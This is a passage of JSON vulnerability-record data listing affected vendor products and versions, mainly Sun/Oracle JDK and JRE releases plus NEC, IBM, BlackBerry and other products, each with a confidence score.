            "model": "jdk 1.5.0 23",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 04",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 05",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 26",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 40",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 61",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 29",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 40",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.581"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 31",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 16",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 20",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 30",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 18",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 11",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.5.071"
          },
          {
            "_id": null,
            "model": "jdk 0 10",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 10",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 24",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 41",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 27",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 03",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 33",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.581"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 14",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 24",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 25",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 32",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 2",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 25",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 24",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk .0 05",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 06",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 41",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 28",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 12",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 13",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 15",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.5.075"
          },
          {
            "_id": null,
            "model": "jre 1.7.0 9",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 21",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 15",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 18",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 22",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 32",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 31",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 8",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 21",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 25",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 38",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 37",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 27",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 15",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.840"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 02",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 28",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 30",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 45",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 51",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.5.075"
          },
          {
            "_id": null,
            "model": "jre 15",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 17",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 12",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 71",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 51",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 13",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.8.020"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 26",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 40",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 26",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 30",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 15",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 39",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 14",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 17",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 18",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.7"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 30",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 02",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 11",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 01",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 12",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk 07",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk 14",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 02",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 12",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 13",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.691"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 13",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 25",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 22",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 35",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 45",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 23",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 65",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 20",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 51",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 27",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0:update 60",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.7.067"
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 12",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 04",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 04",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 38",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 11",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.5.071"
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 4",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 19",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.7.067"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 20",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 23",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 22",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 06",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.776"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.8.020"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 25",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 40",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 9",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 18",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 19",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 14",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 33",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 22",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "google",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "research in motion rim",
            "version": null
          },
          {
            "_id": null,
            "model": "capssuite",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v4 to  v5.1"
          },
          {
            "_id": null,
            "model": "csview",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "/faq navigator"
          },
          {
            "_id": null,
            "model": "csview",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "/web questionnaire"
          },
          {
            "_id": null,
            "model": "enterprisedirectoryserver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "ver6.0 to  ver8.0"
          },
          {
            "_id": null,
            "model": "enterpriseidentitymanager",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "/sg series  intersecvm/sg v1.2"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v3.0"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v3.1"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v4.0"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "/sg series  sg3600lm/lg/lj v6.1"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v6.2"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v7.0"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v7.1"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v8.0"
          },
          {
            "_id": null,
            "model": "express5800",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "/sg series  univerge sg3000lg/lj"
          },
          {
            "_id": null,
            "model": "infocage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "security risk management  v1.0.2 to  v2.1.4"
          },
          {
            "_id": null,
            "model": "istorage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "a series"
          },
          {
            "_id": null,
            "model": "istorage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "d series"
          },
          {
            "_id": null,
            "model": "istorage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "e series"
          },
          {
            "_id": null,
            "model": "istorage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "hs series"
          },
          {
            "_id": null,
            "model": "istorage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "m series  (nas including options )"
          },
          {
            "_id": null,
            "model": "istorage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "s series"
          },
          {
            "_id": null,
            "model": "secureware/pki application development kit",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "ver3.0"
          },
          {
            "_id": null,
            "model": "secureware/pki application development kit",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "ver3.01"
          },
          {
            "_id": null,
            "model": "secureware/pki application development kit",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "ver3.02"
          },
          {
            "_id": null,
            "model": "secureware/pki application development kit",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "ver3.1"
          },
          {
            "_id": null,
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise edition v4.2 to  v6.5"
          },
          {
            "_id": null,
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard edition v4.2 to  v6.5"
          },
          {
            "_id": null,
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard-j edition v4.1 to  v6.5"
          },
          {
            "_id": null,
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "uddi registry v1.1 to  v7.1"
          },
          {
            "_id": null,
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "web edition v4.1 to  v6.5"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise edition v7.1"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise v8.2 to  v9.2"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "express v8.2 to  v9.2"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "foundation v8.2 to  v8.5"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard edition v7.1"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard v8.2 to  v9.2"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard-j edition v7.1 to  v8.1"
          },
          {
            "_id": null,
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "web edition v7.1 to  v8.1"
          },
          {
            "_id": null,
            "model": "webotx enterprise service bus",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v6.4 to  v9.2"
          },
          {
            "_id": null,
            "model": "webotx portal",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v8.2 to  v9.1"
          },
          {
            "_id": null,
            "model": "webotx sip application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard edition v7.1 to  v8.1"
          },
          {
            "_id": null,
            "model": "websam",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "application navigator v3.1.0.x to  v4.1.0.x"
          },
          {
            "_id": null,
            "model": "websam",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "jobcenter cl/web r13.1"
          },
          {
            "_id": null,
            "model": "websam",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "jobcenter cl/web r13.2"
          },
          {
            "_id": null,
            "model": "jdk 01-b06",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.5.0.0 09",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "oracle",
            "version": "1.8"
          },
          {
            "_id": null,
            "model": "jdk .0 04",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0.0 08",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "paging server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jdk .0 03",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 38",
            "scope": null,
            "trust": 0.6,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 2",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hp",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "jdk 07-b03",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 06",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.5.0.0 08",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0.0 12",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 34",
            "scope": null,
            "trust": 0.6,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "oracle",
            "version": "1.8"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0.0 09",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0.0 11",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 11-b03",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.5.0.0 07",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 01",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 20",
            "scope": null,
            "trust": 0.6,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.1"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.0.1"
          },
          {
            "_id": null,
            "model": "bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "bbm protected on blackberry",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1010.3.1.1767"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "bbm on blackberry os",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1010.3.1.1767"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.039"
          },
          {
            "_id": null,
            "model": "jdk update17",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.1"
          },
          {
            "_id": null,
            "model": "security access manager for web",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.2"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.17"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x22025850"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.22"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.2"
          },
